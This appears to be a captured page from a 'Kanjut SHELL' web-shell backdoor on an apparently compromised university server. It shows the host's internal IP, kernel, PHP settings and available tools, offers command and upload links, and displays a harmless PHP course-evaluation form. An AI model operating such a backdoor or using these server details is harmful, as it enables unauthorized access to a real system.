Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.143.241.253
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/jeficklin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jeficklin/Evaluation_Questions.php
<?php	session_start();
	$name = $_POST['name'];
	$Course_Num = $_POST['Course_Num'];
?>

<center>
<H2>
The Selection Form:  Please answer the following questions
</H2>
<form action=Evaluation_Results.php method=post>
<p>
Course has shown me how to bake a perfect souffle:
<INPUT type=radio name=q1 value=Strongly_Agree checked> Strongly Agree 
<INPUT type=radio name=q1 value=Agree> Agree
<INPUT type=radio name=q1 value=Disagree> Disagree
<P>
Course has shown me how to fix a car:
<INPUT type=radio name=q2 value=Strongly_Agree checked> Strongly Agree   
<INPUT type=radio name=q2 value=Agree> Agree       
<INPUT type=radio name=q2 value=Disagree> Disagree
<P>
<input type=submit value=Submit>
<input type=reset value=Reset>
</form>
</center>


Stv3n404 - 2023